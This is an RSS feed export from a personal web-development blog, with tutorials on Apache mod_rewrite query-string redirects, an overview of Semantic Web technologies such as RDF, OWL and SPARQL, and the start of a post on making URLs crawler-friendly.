<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Simon Whatley &#187; url</title>
	<atom:link href="http://www.simonwhatley.co.uk/tag/url/feed" rel="self" type="application/rss+xml" />
	<link>http://www.simonwhatley.co.uk</link>
	<description>The opposite of every great idea is another great idea</description>
	<lastBuildDate>Wed, 02 Nov 2011 09:28:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Apache RewriteRule and query strings</title>
		<link>http://www.simonwhatley.co.uk/apache-rewriterule-and-query-strings</link>
		<comments>http://www.simonwhatley.co.uk/apache-rewriterule-and-query-strings#comments</comments>
		<pubDate>Fri, 18 Feb 2011 10:56:20 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Apache HTTP Server]]></category>
		<category><![CDATA[mod_rewrite]]></category>
		<category><![CDATA[SES]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL rewriting]]></category>
		<category><![CDATA[webserver]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=3855</guid>
		<description><![CDATA[At first glance, the way the Apache mod_rewrite module handles query strings can be a little intimidating. mod_rewrite works by sitting on your server in a file called htaccess, and “catching” requests for URL‘s. It then checks these URL request against a series of rules and conditions you have set. If the request meets any of the rules and conditions, it applies then necessary changes to the URL, then reprocesses the request with the changes you have directed.]]></description>
			<content:encoded><![CDATA[<p>At first glance, the way the Apache <code>mod_rewrite</code> module handles query strings can be a little intimidating. <code>mod_rewrite</code> works by sitting on your server in a file called <code>htaccess</code>, and &#8220;catching&#8221; requests for <abbr title="Universal Resource Locator">URL</abbr>&#8216;s. It then checks these <abbr title="Universal Resource Locator">URL</abbr> request against a series of rules and conditions you have set. If the request meets any of the rules and conditions, it applies then necessary changes to the <abbr title="Universal Resource Locator">URL</abbr>, then reprocesses the request with the changes you have directed. Apache helpfully provides some <a href="http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond" title="Apache RewriteCond Directive" target="_blank" rel="nofollow">RewriteCond documentation</a></p>
<p>The most common mistake people make when thinking of <abbr title="Universal Resource Locator">URL</abbr> redirection with <code>mod_rewrite</code>, is they believe it creates something, or changes something. It doesn&#8217;t.</p>
<p>Here is a simple example, redirecting a page dependent upon its query string. The rewrite condition and rule looks like this:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteCond %{QUERY_STRING} ^id=([0-9]*)$
RewriteRule ^page\.php$ http://www.example.com/page/%1.php [R=302,L]</pre></div></div>

<p>The rewrite condition matches a numerical ID between 0 and 9. According to the official documentation, you would expect the following behaviour:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">/page.php?id=1 -&gt; http://www.example.com/page/1.php
/page.php?id=10 -&gt; http://www.example.com/page/10.php</pre></div></div>

<p>However, if you don’t append something new, then <strong>the original query is passed through</strong> by default. This results in the following:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">/page.php?id=1 -&gt; http://www.example.com/page/1.php?id=1
/page.php?id=10 -&gt; http://www.example.com/page/10.php?id=10</pre></div></div>

<p>If you want to discard the original query string you must append an empty question mark at the end of the rule; the <strong>query string not append</strong> or <strong>query string discard</strong> flag.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteCond %{QUERY_STRING} ^id=([0-9]*)$
RewriteRule ^page\.php$ http://www.example.com/page/%1.php? [R=302,L]</pre></div></div>

<p>Putting it all together, here&#8217;s a quick reference for dealing with query string in a RewriteRule.</p>
<p>Keep original query (i.e., the default behaviour)</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php [L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php?foo=bar</pre></div></div>

<p>Discard original query</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php? [L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php</pre></div></div>

<p>Replace original query</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php?bar=baz [L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php?bar=foo</pre></div></div>

<p>Append new query to original query</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php?bar=baz [QSA,L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php?foo=bar&amp;bar=foo</pre></div></div>

<p>Dave Child has created a great <a href="http://www.addedbytes.com/cheat-sheets/mod_rewrite-cheat-sheet/" title="mod_rewrite cheat sheet" target="_blank" rel="nofollow">mod_rewrite cheat sheet</a>; a one-page reference sheet, listing flags for the <code>RewriteRule</code> and <code>RewriteCond</code> directives, list of server variables, a regular expression guide and several examples of common rules.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/apache-rewriterule-and-query-strings/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Apache .htaccess query string redirects</title>
		<link>http://www.simonwhatley.co.uk/apache-htaccess-query-string-redirects</link>
		<comments>http://www.simonwhatley.co.uk/apache-htaccess-query-string-redirects#comments</comments>
		<pubDate>Thu, 17 Feb 2011 21:53:42 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Apache HTTP Server]]></category>
		<category><![CDATA[mod_rewrite]]></category>
		<category><![CDATA[SES]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL rewriting]]></category>
		<category><![CDATA[webserver]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=3857</guid>
		<description><![CDATA[One of the most common tasks performed by Apache and htaccess is the manipulation of a URL and configuring a redirect for a specific page.]]></description>
			<content:encoded><![CDATA[<p>One of the most common tasks performed by Apache and <code>htaccess</code> is the manipulation of a <abbr title="Universal Resource Locator">URL</abbr> and configuring a redirect for a specific page. Creating a <strong>single page redirect</strong> in Apache is a simple task, which uses <code>mod_alias</code> module.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">Redirect /page.php http://www.example.com/target.php</pre></div></div>

<p>More commonly, however, you&#8217;re likely to want to do a <strong>mass-redirection of pages</strong>. To accomplish this, you may use the <code>RedirectMatch</code> directive.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RedirectMatch ^/category/(.*)$ http://www.example.com/topic/$1</pre></div></div>

<p>This will redirect any page from the <code>category</code> folder to the corresponding one in <code>topic</code> folder with a convenient <strong>one-by-one redirect</strong>.</p>
<p>However, neither <code>Redirect</code> nor <code>RedirectMatch</code> allow you to specify a query string for the redirect source. In other words, the following statements are invalid and they&#8217;ll simply be ignored.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;"># single page redirect
Redirect /page.php?id=1  http://www.example.com/page/1
Redirect /page.php?id=10  http://www.example.com/page/10
&nbsp;
# multi-page redirect
RedirectMatch ^/page.php?id=([0-9]*)$  http://www.example.com/page/$1</pre></div></div>

<p>The solution requires a change of focus from Apache&#8217;s <code>mod_alias</code> module to the <code>mod_rewrite</code> module. Here’s an example.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteEngine On
RewriteCond %{REQUEST_URI}  ^/page\.php$
RewriteCond %{QUERY_STRING} ^id=([0-9]*)$
RewriteRule ^(.*)$ http://www.example.com/page/%1.php [L,R=301]</pre></div></div>

<p>The <code>mod_rewrite</code> module uses a rule-based rewriting engine (based on a regular-expression parser) to rewrite requested <abbr title="Universal Resource Locator">URL</abbr>s on the fly. It supports an unlimited number of rules and an unlimited number of attached rule conditions for each rule, to provide a really flexible and powerful <abbr title="Universal Resource Locator">URL</abbr> manipulation mechanism. The <abbr title="Universal Resource Locator">URL</abbr> manipulations can depend on various tests, of server variables, environment variables, <abbr title="HyperText Transfer Protocol">HTTP</abbr> headers, or time stamps.</p>
<p>So what does this all mean with respect to the above example?</p>
<p>The first line enables the <code>RewriteEngine</code> module. Note that <code>mod_rewrite</code> Apache module must be installed and enabled in order to use the <code>RewriteEngine</code>.</p>
<p>The <code>RewriteCond</code> statements set all the rewrite conditions. The fourth line, the real rewrite directive, will be executed <strong>if and only if all conditions are satisfied by the current request</strong>.</p>
<p>The first condition is for the page I need to redirect. This condition is included to prevent any unexpected errors if other pages are using the ID variable. Next, I base the rewrite rule on the value for the current request&#8217;s query string. The ID value within the regular expression is &#8220;wrapped&#8221; to be able to reuse the match later as a back-reference.</p>
<p>The final line is the rewrite rule. This line looks similar to the <code>RedirectMatch</code> statement. It specifies the redirection source, then the redirection target. The value captured by the second <code>RewriteCond</code> is referenced in the target with the <code>%N</code> keyword (in this example %1). The <code>RewriteRule</code> also includes a comma-separated list of flags that should be applied to the rule. In this case, <code>L</code> stops the rewriting process immediately whilst <code>R=301</code> specifies a permanent external redirect (301 is an <a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html" title="HTTP Status Codes" target="_blank" rel="nofollow">HTTP Status Code</a>).</p>
<p><strong>Further reading:</strong></p>
<ul>
<li><a href="http://httpd.apache.org/docs/2.2/rewrite/" title="Apache URL rewriting guide" target="_blank" rel="nofollow">Apache URL rewriting guide</a></li>
<li><a href="http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html" title="Apache mod_rewrite" target="_blank" rel="nofollow">Apache mod_rewrite</a></li>
<li><a href="http://httpd.apache.org/docs/2.2/mod/mod_alias.html" title="Apache mod_alias" target="_blank" rel="nofollow">Apache mod_alias</a></li>
</ul>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/apache-htaccess-query-string-redirects/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>An Introduction to the Semantic Web</title>
		<link>http://www.simonwhatley.co.uk/an-introduction-to-the-semantic-web</link>
		<comments>http://www.simonwhatley.co.uk/an-introduction-to-the-semantic-web#comments</comments>
		<pubDate>Fri, 18 Jun 2010 12:20:49 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Semantic Web]]></category>
		<category><![CDATA[data]]></category>
		<category><![CDATA[DCMI]]></category>
		<category><![CDATA[Dublin Core]]></category>
		<category><![CDATA[Dublin Core Metadata Initiative]]></category>
		<category><![CDATA[FOAF]]></category>
		<category><![CDATA[Friend of a Friend]]></category>
		<category><![CDATA[graphs]]></category>
		<category><![CDATA[HTTP]]></category>
		<category><![CDATA[Linked Data]]></category>
		<category><![CDATA[machine readable]]></category>
		<category><![CDATA[Natural Language Processing]]></category>
		<category><![CDATA[ontology]]></category>
		<category><![CDATA[OpenCalais]]></category>
		<category><![CDATA[OWL]]></category>
		<category><![CDATA[protocol]]></category>
		<category><![CDATA[PURL]]></category>
		<category><![CDATA[RDF]]></category>
		<category><![CDATA[RDF query language]]></category>
		<category><![CDATA[RDFa]]></category>
		<category><![CDATA[RDFs]]></category>
		<category><![CDATA[Resource Description Framework]]></category>
		<category><![CDATA[semantic]]></category>
		<category><![CDATA[SPARQL]]></category>
		<category><![CDATA[subject-predicate-object]]></category>
		<category><![CDATA[Thomson Reuters]]></category>
		<category><![CDATA[Tim Berners-Lee]]></category>
		<category><![CDATA[Triplestore]]></category>
		<category><![CDATA[Uniform Resource Identifier]]></category>
		<category><![CDATA[Uniform Resource Locator]]></category>
		<category><![CDATA[Uniform Resource Name]]></category>
		<category><![CDATA[URI]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[web of data]]></category>
		<category><![CDATA[Web Ontology Language]]></category>
		<category><![CDATA[world wide web]]></category>
		<category><![CDATA[XML]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=3559</guid>
		<description><![CDATA[The Semantic Web is a web of data. There is lots of data we all use every day, and most of it is not part of the web. I can see my bank statements on the web, and my photographs, and I can see my appointments in a calendar. But can I see my photos in a calendar to see what I was doing when I took them and on a map so I know where I took them? Can I see bank statement lines in a calendar? The answer, right now, is no.]]></description>
			<content:encoded><![CDATA[<p>The <a href="http://en.wikipedia.org/wiki/Semantic_Web" title="Wikipedia: Semantic Web" target="_blank" rel="nofollow">Semantic Web</a> is a <a href="http://en.wikipedia.org/wiki/Linked_Data" title="Wikipedia: Linked Data" target="_blank" rel="nofollow">web of data</a>. There is lots of data we all use every day, and most of it is not part of the web. I can see my bank statements on the web, and my photographs, and I can see my appointments in a calendar. But can I see my photos in a calendar to see what I was doing when I took them and on a map so I know where I took them? Can I see bank statement lines in a calendar? The answer, right now, is no.</p>
<p>But why not? Because we don&#8217;t have a web of data. Because data is controlled by applications, and each application keeps its data to itself; applications don&#8217;t like to share.</p>
<p>The original Web mainly concentrated on the interchange of documents, however, the Semantic Web is about two things: It is about common formats for integration and combination of data drawn from diverse sources. It is also about language for recording how the data relates to real world objects. That allows a person, or a machine, to start off in one database, and then move through an unending set of databases which are connected not by wires but by being about the same thing.</p>
<p>Tim Berners-Lee describes the Semantic Web vision as:</p>
<blockquote><p>I have a dream for the Web [in which computers] become capable of analysing all the data on the Web, the content, links, and transactions between people and computers. A Semantic Web, which should make this possible, has yet to emerge, but when it does, the day-to-day mechanisms of trade, bureaucracy and our daily lives will be handled by machines talking to machines. The intelligent agents people have touted for ages will finally materialise.</p></blockquote>
<p>What are the ideas and technologies that facilitate this vision? Below I give an overview and links to a number of them:</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h3>Linked Data</h3>
<p>Linked Data is about using the Web to connect related data that wasn&#8217;t previously linked, or using the Web to lower the barriers to linking data currently linked using other methods. More specifically, Wikipedia defines Linked Data as &#8220;a term used to describe a recommended best practice for exposing, sharing, and connecting pieces of data, information, and knowledge on the Semantic Web using <abbr title="Uniform Resource Identifier">URIs</abbr> and <abbr title="Resource Description Framework">RDF</abbr>.&#8221;</p>
<ul>
<li><a href="http://linkeddata.org" title="Linked Data: Connect Distributed Data Across The Web" target="_blank" rel="nofollow">http://linkeddata.org</a></li>
<li><a href="http://en.wikipedia.org/wiki/Linked_Data" title="Wikipedia: Linked Data" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Linked_Data</a></li>
</ul>
<h3>Resource Description Framework</h3>
<p>The Resource Description Framework (<abbr title="Resource Description Framework">RDF</abbr>) is a general-purpose language for representing information in the Web.</p>
<p>The <strong>Resource Description Framework Schema (<abbr title="Resource Description Framework Schema">RDF-S</abbr>)</strong> is a semantic extension of <abbr title="Resource Description Framework">RDF</abbr> that provides mechanisms for describing groups of related resources and the relationships between these resources.</p>
<ul>
<li><a href="http://www.w3.org/TR/rdf-schema/" title="World Wide Web Consortium: RDF Schema" target="_blank" rel="nofollow">http://www.w3.org/TR/rdf-schema/</a></li>
<li><a href="http://en.wikipedia.org/wiki/RDF_Schema" title="Wikipedia: RDF Schema" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/RDF_Schema</a></li>
</ul>
<p>The <strong>Resource Description Framework in Attributes (<abbr title="Resource Description Framework in Attributes">RDFa)</strong> allows authors to add meaning to web page elements. Using a few simple <abbr title="eXtensible HyperText Markup Language">XHTML</abbr> attributes, authors can mark up human-readable data with machine-readable indicators for browsers and other programs to interpret. A web page can include markup for items as simple as the title of an article, or as complex as a user&#8217;s complete social network.</p>
<ul>
<li><a href="http://www.w3.org/TR/xhtml-rdfa-primer/" title="World Wide Web Consortium: XHTML RDFa Primer" target="_blank" rel="nofollow">http://www.w3.org/TR/xhtml-rdfa-primer/</a></li>
<li><a href="http://en.wikipedia.org/wiki/RDFa" title="Wikipedia: RDFa" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/RDFa</a></li>
</ul>
<h3>Friend of a Friend (<abbr title="Friend of a Friend">FOAF</abbr>)</h3>
<p>The <em>Friend of a Friend</em> project is creating a Web of machine-readable pages describing people, the links between them and the things they create and do. <abbr title="Friend of a Friend">FOAF</abbr> is about your place in the Web, and the Web&#8217;s place in our world. <abbr title="Friend of a Friend">FOAF</abbr> is a simple technology that makes it easier to share and use information about people and their activities (eg. photos, calendars, weblogs), to transfer information between Web sites, and to automatically extend, merge and re-use it online.</p>
<ul>
<li><a href="http://www.foaf-project.org" title="FOAF Project" target="_blank" rel="nofollow">http://www.foaf-project.org</a></li>
<li><a href="http://en.wikipedia.org/wiki/FOAF_(software)" title="Wikipedia: FOAF (Software)" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/FOAF_(software)</a></li>
<li><a href="http://en.wikipedia.org/wiki/Friend_of_a_friend" title="Wikipedia: Friend of a Friend" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Friend_of_a_friend</a></li>
<li><a href="http://xmlns.com/foaf/spec/" title="FOAF Vocabulary Specification" target="_blank" rel="nofollow">http://xmlns.com/foaf/spec/</a></li>
</ul>
<h3>Web Ontology Language (<abbr title="Web Ontology Language">OWL</abbr>)</h3>
<p>The <abbr title="Web Ontology Language">OWL</abbr> Web Ontology Language is designed for use by applications that need to process the content of information instead of just presenting information to humans. <abbr title="Web Ontology Language">OWL</abbr> facilitates greater machine interpretability of Web content than that supported by <abbr title="eXtensible Markup Language">XML</abbr>, <abbr title="Resource Description Framework">RDF</abbr>, and <abbr title="Resource Description Framework">RDF</abbr> Schema (<abbr title="Resource Description Framework Schema">RDF-S</abbr>) by providing additional vocabulary along with a formal semantics.</p>
<ul>
<li><a href="http://www.w3.org/TR/owl-features/" title="World Wide Web Consortium: OWL Web Ontology Language" target="_blank" rel="nofollow">http://www.w3.org/TR/owl-features/</a></li>
<li><a href="http://en.wikipedia.org/wiki/Web_Ontology_Language" title="Wikipedia: Web Ontology Language" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Web_Ontology_Language</a></li>
</ul>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h3>Dublin Core Metadata Initiative (<abbr title="Dublin Core Metadata Initiative">DCMI</abbr>)</h3>
<p>The Dublin Core set of metadata elements provides a small and fundamental group of text elements through which most resources can be described and catalogued. Using only 15 base text fields, a Dublin Core metadata record can describe physical resources such as books, digital materials such as video, sound, image, or text files, and composite media like web pages. Metadata records based on Dublin Core are intended to be used for cross-domain information resource description and have become standard in the fields of library science and computer science. Implementations of Dublin Core typically make use of <abbr title="eXtensible Markup Language">XML</abbr> and are Resource Description Framework (<abbr title="Resource Description Framework">RDF</abbr>) based.</p>
<ul>
<li><a href="http://dublincore.org" title="Dublin Core Metadata Initiative" target="_blank" rel="nofollow">http://dublincore.org</a></li>
<li><a href="http://en.wikipedia.org/wiki/Dublin_core" title="Wikipedia: Dublin Core" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Dublin_core</a></li>
</ul>
<h3>Triplestore</h3>
<p>A triplestore is a purpose-built database for the storage and retrieval of Resource Description Framework (<abbr title="Resource Description Framework">RDF</abbr>) metadata.</p>
<p>Much like a relational database, information is stored in a triplestore and retrieved via a query language called <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr>. Unlike a relational database, a triplestore is optimised for the storage and retrieval of many short statements called triples, in the form of subject-predicate-object, like &#8220;Bob is 35&#8243; or &#8220;Bob knows Fred&#8221;.</p>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Triplestore" title="Wikipedia: Triplestore" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Triplestore</a></li>
</ul>
<h3>SPARQL Protocol and RDF Query Language (<abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr>)</h3>
<p><abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> is an <abbr title="Resource Description Framework">RDF</abbr> query language, which can be used to express queries across diverse data sources, whether the data is stored natively as <abbr title="Resource Description Framework">RDF</abbr> or viewed as <abbr title="Resource Description Framework">RDF</abbr> via middleware. <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> contains capabilities for querying required and optional graph patterns along with their conjunctions and disjunctions. <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> also supports extensible value testing and constraining queries by source <abbr title="Resource Description Framework">RDF</abbr> graph. The results of <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> queries can be results sets or <abbr title="Resource Description Framework">RDF</abbr> graphs.</p>
<ul>
<li><a href="http://www.w3.org/TR/rdf-sparql-query/" title="World Wide Web Consortium: SPARQL Query" target="_blank" rel="nofollow">http://www.w3.org/TR/rdf-sparql-query/</a></li>
<li><a href="http://en.wikipedia.org/wiki/Sparql" title="Wikipedia: SPARQL" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Sparql</a></li>
</ul>
<h3>Simple Knowledge Organization System (<abbr title="Simple Knowledge Organization System">SKOS</abbr>) </h3>
<p><abbr title="Simple Knowledge Organization System">SKOS</abbr> is a family of formal languages designed for representation of thesauri, classification schemes, taxonomies, subject-heading systems, or any other type of structured controlled vocabulary. <abbr title="Simple Knowledge Organization System">SKOS</abbr> is built upon <abbr title="Resource Description Framework">RDF</abbr> and <abbr title="Resource Description Framework Schema">RDF-S</abbr>, and its main objective is to enable easy publication of controlled structured vocabularies for the Semantic Web.</p>
<ul>
<li><a href="http://www.w3.org/2004/02/skos/" title="World Wide Web Consortium: SKOS" target="_blank" rel="nofollow">http://www.w3.org/2004/02/skos/</a></li>
<li><a href="http://en.wikipedia.org/wiki/Simple_Knowledge_Organization_System" title="Wikipedia: Simple Knowledge Organisation System" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Simple_Knowledge_Organization_System</a></li>
</ul>
<h3>Persistent Uniform Resource Locator (<abbr title="Persistent Uniform Resource Locator">PURL</abbr>)</h3>
<p>A <abbr title="Persistent Uniform Resource Locator">PURL</abbr> is a type of Uniform Resource Locator (<abbr title="Uniform Resource Locator">URL</abbr>) that does not directly describe the location of the resource to be retrieved but instead describes an intermediate, more persistent location which, when retrieved, results in redirection (e.g. via a 302 <abbr title="HyperText Transfer Protocol">HTTP</abbr> status code) to the current location of the final resource.</p>
<p><abbr title="Persistent Uniform Resource Locator">PURLs</abbr> are an interim measure, while Uniform Resource Names (<abbr title="Uniform Resource Names">URNs</abbr>) are being mainstreamed, to solve the problem of transitory <abbr title="Uniform Resource Identifier">URIs</abbr> in location-based <abbr title="Uniform Resource Identifier">URI</abbr> schemes like <abbr title="HyperText Transfer Protocol">HTTP</abbr>.</p>
<ul>
<li><a href="http://purl.org/docs/index.html" title="Persistent Uniform Resource Locators" target="_blank" rel="nofollow">http://purl.org/docs/index.html</a></li>
<li><a href="http://en.wikipedia.org/wiki/Persistent_Uniform_Resource_Locator" title="Wikipedia: Persistent Uniform Resource Locator" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Persistent_Uniform_Resource_Locator</a></li>
</ul>
<h3>Thomson Reuters OpenCalais</h3>
<p>OpenCalais is a rapidly growing toolkit of capabilities that allow you to readily incorporate state-of-the-art semantic functionality within your blog, content management system, website or application.</p>
<p>The OpenCalais Web Service automatically creates rich semantic metadata for the content you submit. Using Natural Language Processing (<abbr title="Natural Language Processing">NLP</abbr>), machine learning and other methods, Calais analyses your document and finds the entities within it. Calais goes beyond classic entity identification returning the facts and events hidden within your text as well.</p>
<ul>
<li><a href="http://www.opencalais.com" title="Thomson Reuters OpenCalais" target="_blank" rel="nofollow">http://www.opencalais.com</a></li>
</ul>
<p>If you have any more suggestions that should be included above, I&#8217;ll be happy to hear them.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/an-introduction-to-the-semantic-web/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Optimise Your URLs for Web Crawlers and Indexing</title>
		<link>http://www.simonwhatley.co.uk/optimise-your-urls-for-web-crawlers-and-indexing</link>
		<comments>http://www.simonwhatley.co.uk/optimise-your-urls-for-web-crawlers-and-indexing#comments</comments>
		<pubDate>Thu, 08 Oct 2009 11:15:05 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Analytics]]></category>
		<category><![CDATA[Search]]></category>
		<category><![CDATA[Canonical]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Index]]></category>
		<category><![CDATA[Information retrieval]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Robots exclusion standard]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[search engine optimisation]]></category>
		<category><![CDATA[search engines]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL redirection]]></category>
		<category><![CDATA[Web archiving]]></category>
		<category><![CDATA[web crawlers]]></category>
		<category><![CDATA[Web search engine]]></category>
		<category><![CDATA[webmaster]]></category>
		<category><![CDATA[world wide web]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=2011</guid>
		<description><![CDATA[Many questions about website architecture, crawling and indexing, and even ranking issues can be boiled down to one central issue: How easy is it for search engines to crawl your site?]]></description>
			<content:encoded><![CDATA[<p>Many questions about website architecture, crawling and indexing, and even ranking issues can be boiled down to one central issue: How easy is it for search engines to crawl your site?</p>
<p>The Internet is not simply a big place it is a huge place; new content is being created all the time. Google, Yahoo and Microsoft each have a finite number of resources, so when faced with the nearly-infinite quantity of content that&#8217;s available online, their various crawlers are only able to find and crawl a percentage of that content. Then, of all the content they&#8217;ve crawled, they&#8217;re only able to index a portion. Of course with the cheapness of storage, the search engines are able to index more and more content each day, but not at the pace the Web is growing.</p>
<p><abbr title="Universal Resource Locator">URL</abbr>s are like the bridges between your website and a search engine&#8217;s crawler: crawlers need to be able to find and cross those bridges (i.e., find and crawl your <abbr title="Universal Resource Locator">URL</abbr>s) in order to get to your site&#8217;s content. If your <abbr title="Universal Resource Locator">URL</abbr>s are complicated or redundant, crawlers are going to spend time tracing and retracing their steps; if your <abbr title="Universal Resource Locator">URL</abbr>s are organised and lead directly to distinct content, crawlers can spend their time accessing your content rather than crawling through empty pages, or crawling the same content over and over via different <abbr title="Universal Resource Locator">URL</abbr>s.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<p>So, what can you do as a website developer or owner to reduce that labyrinth of <abbr title="Universal Resource Locator">URL</abbr>s and helping crawlers find more of your content faster? Below are a few ideas:</p>
<ul>
<li><strong>Remove unnecessary query string details from the URL.</strong><br />
Parameters in the <abbr title="Universal Resource Locator">URL</abbr> that don&#8217;t change the content of the page&#8211;like session <abbr title="Identity">ID</abbr>s or list sort orders&#8211;can be removed from the <abbr title="Universal Resource Locator">URL</abbr> and put into a cookie. By putting this information in a cookie and <a href="http://en.wikipedia.org/wiki/URL_redirection#HTTP_status_codes_3xx" title="Wikipedia: URL Redirection">301 redirecting</a> to a <q>clean</q> <abbr title="Universal Resource Locator">URL</abbr>, you retain the information and reduce the number of <abbr title="Universal Resource Locator">URL</abbr>s pointing to that same content.
</li>
<li><strong>Stop infinite pagination in, for example, lists and calendars.</strong><br />
If you have a calendar with infinite past and future dates or a list with infinite pagination you have what is described as an <q>infinite crawl space</q>, which is a huge burden on crawlers. To resolve the calendar issue, you can add no-follow attributes to links to dynamically created future calendar pages. When creating pagination links, disable previous and next links when the first and last pages are reached and redirect users to an appropriate page if the query string in the <abbr title="Universal Resource Locator">URL</abbr> is <q>hacked</q> (this may be a <q>page not found</q> static page).
</li>
<li><strong>Utilise the robots.txt file to prevent actions the web crawlers can&#8217;t or shouldn&#8217;t perform.</strong><br />
